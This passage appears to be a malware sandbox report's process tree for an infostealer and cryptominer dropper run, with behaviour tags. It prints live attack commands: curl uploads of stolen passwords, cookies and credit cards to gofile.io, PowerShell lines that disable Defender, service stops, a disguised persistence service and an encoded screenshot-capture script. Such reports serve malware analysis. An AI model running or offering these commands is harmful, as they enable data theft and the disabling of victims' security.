KQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3904 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fdyoxmrg\fdyoxmrg.cmdline"6⤵PID:2080
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES346A.tmp" "c:\Users\Admin\AppData\Local\Temp\fdyoxmrg\CSCCA20C1B4ABC54C739010AAC7E37F91D0.TMP"7⤵PID:876
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2580
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:1048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2140
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4728
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4308
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:2960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2024
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4224"4⤵PID:872
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 42245⤵
- Kills process with taskkill
PID:1908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 784"4⤵PID:4964
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 7845⤵
- Kills process with taskkill
PID:3216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:1848
-
C:\Windows\system32\getmac.exegetmac5⤵PID:4784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35602\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\lnQQs.zip" *"4⤵PID:4604
-
C:\Users\Admin\AppData\Local\Temp\_MEI35602\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI35602\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\lnQQs.zip" *5⤵
- Executes dropped EXE
PID:1880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:2532
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:4820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:1996
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:4188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:2412
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:3256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:3312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:2880
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:4904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:2248
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1140
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\TestExe.exe"C:\Users\Admin\AppData\Local\Temp\Files\TestExe.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4636
-
-
C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe"C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe"2⤵
- Executes dropped EXE
PID:800 -
C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe"C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\kali_tools.exe"C:\Users\Admin\AppData\Local\Temp\Files\kali_tools.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:900
-
-
C:\Users\Admin\AppData\Local\Temp\Files\nurik.exe"C:\Users\Admin\AppData\Local\Temp\Files\nurik.exe"2⤵
- Executes dropped EXE
PID:4936 -
C:\Users\Admin\AppData\Local\Temp\Files\nurik.exe"C:\Users\Admin\AppData\Local\Temp\Files\nurik.exe"3⤵
- Drops startup file
- Executes dropped EXE
PID:3448 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store5.gofile.io/uploadFile"4⤵PID:248
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store5.gofile.io/uploadFile5⤵PID:1380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store5.gofile.io/uploadFile"4⤵PID:440
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store5.gofile.io/uploadFile5⤵PID:3760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store5.gofile.io/uploadFile"4⤵PID:916
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store5.gofile.io/uploadFile5⤵PID:2436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store-eu-par-4.gofile.io/uploadFile"4⤵PID:4560
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store-eu-par-4.gofile.io/uploadFile5⤵PID:3988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store-eu-par-4.gofile.io/uploadFile"4⤵PID:2548
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store-eu-par-4.gofile.io/uploadFile5⤵PID:2908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store-eu-par-4.gofile.io/uploadFile"4⤵PID:3672
-
C:\Windows\system32\curl.execurl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store-eu-par-4.gofile.io/uploadFile5⤵PID:948
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Fast%20Download.exe"C:\Users\Admin\AppData\Local\Temp\Files\Fast%20Download.exe"2⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4948 -
C:\Windows\SysWOW64\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3548
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4020
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe"C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3208 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:1492 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:4032
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3524
-
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2016
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:1388
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1828
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:4444
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:1692
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:2140
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:3588
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:2832
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
PID:1008
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
PID:4748
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:4596
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"3⤵
- Launches sc.exe
PID:3716
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:2492
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:1408
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"2⤵
- Executes dropped EXE
PID:3728 -
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:4880 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\stub.exe'"4⤵PID:2020
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\stub.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"4⤵PID:1480
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:2492
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:2028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:1624
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:5004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"4⤵PID:1092
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 25⤵PID:2188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"4⤵PID:2024
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 25⤵PID:2832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:4832
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:2912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:2880
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:3900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe""4⤵
- Hide Artifacts: Hidden Files and Directories
PID:2140 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"5⤵
- Views/modifies file attributes
PID:2532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵PID:4908
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5100
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"4⤵PID:3612
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall5⤵
- Modifies registry key
PID:4468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:4432
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:3436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon"4⤵PID:1868
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon5⤵PID:2524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:3332
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:1548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
PID:860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:4924
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:2212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:664 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4956
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:1304
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:1932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:2208
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:4816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvA